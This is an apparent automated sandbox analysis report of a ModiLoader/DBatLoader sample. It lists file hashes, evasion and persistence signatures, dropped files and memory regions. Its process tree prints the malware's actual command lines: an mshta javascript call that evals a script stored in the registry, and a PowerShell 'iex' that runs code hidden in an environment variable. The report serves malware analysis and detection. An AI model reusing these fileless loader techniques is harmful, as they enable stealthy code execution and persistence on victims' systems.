Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    08-05-2024 04:04

General

  • Target

    231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe

  • Size

    260KB

  • MD5

    231d93afc1ca094a42dc22bef5ffa89e

  • SHA1

    c788c8b7ee766e8770084ed260c976481b6395dc

  • SHA256

    562ba4904106bb5d15d9ff98c67076ad64759de1512e189f590c3986fa14b5d8

  • SHA512

    6eb8030b7663f54d855a283eea3f93bce33027d74f1cd12122479b78bb6adc871be58ca1eefb3c3249941ff2d7bafcbd4aff3ed486274e8f0df84cb8c4262fe4

  • SSDEEP

    6144:TojPGsjKyqnH8nZwM7I4Ar2TFYYjHlQb/:Teeshqncnjc4R7jHlQb/

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 60 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\231d93afc1ca094a42dc22bef5ffa89e_JaffaCakes118.exe"
      2⤵
        PID:2464
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:KuJ0veuR2="y5fnkmm";dH99=new%20ActiveXObject("WScript.Shell");ACq4tS2s="La2yE";Ewm6W=dH99.RegRead("HKLM\\software\\Wow6432Node\\WbKqYpL\\EuI9vnci");ZkBAqjI5="dQsw9o7L";eval(Ewm6W);ln7rI8sR="e";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xzsaijuw
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1836
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:1052

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\43e4\8d79.6f350

        Filesize

        9KB

        MD5

        557d5ef03cd7fe983967ae30fd651e09

        SHA1

        01774b6c426526b29900133386351480168d3b92

        SHA256

        5b0b89faec162bd9751299ef418898e94d6d2708adbf781d5955de041d769810

        SHA512

        69c1ce2530be1848fcf46e0f93b590429926c4e4c8ec7e5cda6039c5dd710ca504f33bcbf50bcc139de8ad0eb23c33eb7e5cc7d0a0b00b8a7f64fb7275cf4dc4

      • C:\Users\Admin\AppData\Local\43e4\b67d.bat

        Filesize

        55B

        MD5

        27ce144177a8617384899301a2b4330f

        SHA1

        1dead7588f1982006065dc8a25deb05385fbe649

        SHA256

        fa24ed9d8ea201f657bfea7f56fc698a39216eecccdc29fc0a12dc3592badce4

        SHA512

        0724ac2a3c9321241afdaad3fed8923b5748a47fde6319daf4fd320420a0a20e5487c5c1e36bdea009c5e686371fd172832ba92e4e9086f307afb7d8c741608b

      • C:\Users\Admin\AppData\Local\43e4\fa89.lnk

        Filesize

        857B

        MD5

        a63513a04f3145a86623770392e17f85

        SHA1

        aedc23609bdfbd6a9b307ef8cdf564a2a0595589

        SHA256

        bfcb7bdfe5c891890e284c91d2fd3bb0ef46363bd9946d9f52ca4c2be6615731

        SHA512

        562349ce4c6f9776b17c167775cc9f1f136fd33dd577303d15c4a69bda662efd40d2b41595f80d91ed2ddee4d68cb1b0e2a4b6f4fd076a9642c4a580bc02b407

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3011.lnk

        Filesize

        975B

        MD5

        70651a4a48ed6d78f49a454134b9b191

        SHA1

        6f3a6b378f3072262cbcf9fc5ca9953805efde3a

        SHA256

        9dec0129956599927f90c9ec7ddc41f4d3bf3ce7c7ce3c7f74d1dd1b5abc0b23

        SHA512

        9f357f9044a012931317a274080cd45651c9c4af518a1edf052d47c74765c54f410ede5d5bb0f71b9c5ebec1cd8b21e827f3587193269411f2b3c99cceaf7f31

      • C:\Users\Admin\AppData\Roaming\ef44\0b63.6f350

        Filesize

        49KB

        MD5

        e3601c7fc9b3ea1c8d158655b315c4f4

        SHA1

        b4762a047e83fdc007db006575850d133eb75d33

        SHA256

        f947c04096d1527ceeba78890f60663a78f26e9d58f78c3e9258416f7f205980

        SHA512

        888dcbae0d57d5f76d1c5b5e7dc459141835ff302de0be5aa424503455f2d92431011f6be4be2075721fc01ebb6d7173a070181f0726a567fbe9f6efc4c2c237

      • memory/1052-74-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-77-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-80-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-82-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-73-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-72-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-75-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-76-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-78-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-79-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-81-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-83-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-84-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-85-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-86-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1052-87-0x00000000001F0000-0x0000000000331000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-36-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-37-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-58-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-40-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-43-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-59-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-66-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-57-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-56-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-55-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-54-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-49-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-48-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-47-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-46-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-45-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-44-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-42-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-41-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-39-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-38-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-34-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-35-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-33-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-31-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-30-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-29-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-28-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-23-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-27-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-32-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/1836-25-0x00000000000F0000-0x0000000000231000-memory.dmp

        Filesize

        1.3MB

      • memory/2464-2-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2464-12-0x0000000000220000-0x00000000002F6000-memory.dmp

        Filesize

        856KB

      • memory/2464-11-0x0000000000220000-0x00000000002F6000-memory.dmp

        Filesize

        856KB

      • memory/2464-7-0x0000000000220000-0x00000000002F6000-memory.dmp

        Filesize

        856KB

      • memory/2464-8-0x0000000000220000-0x00000000002F6000-memory.dmp

        Filesize

        856KB

      • memory/2464-9-0x0000000000220000-0x00000000002F6000-memory.dmp

        Filesize

        856KB

      • memory/2464-10-0x0000000000220000-0x00000000002F6000-memory.dmp

        Filesize

        856KB

      • memory/2464-6-0x0000000000220000-0x00000000002F6000-memory.dmp

        Filesize

        856KB

      • memory/2464-5-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2464-4-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2716-26-0x0000000005860000-0x0000000005936000-memory.dmp

        Filesize

        856KB

      • memory/2716-21-0x0000000005860000-0x0000000005936000-memory.dmp

        Filesize

        856KB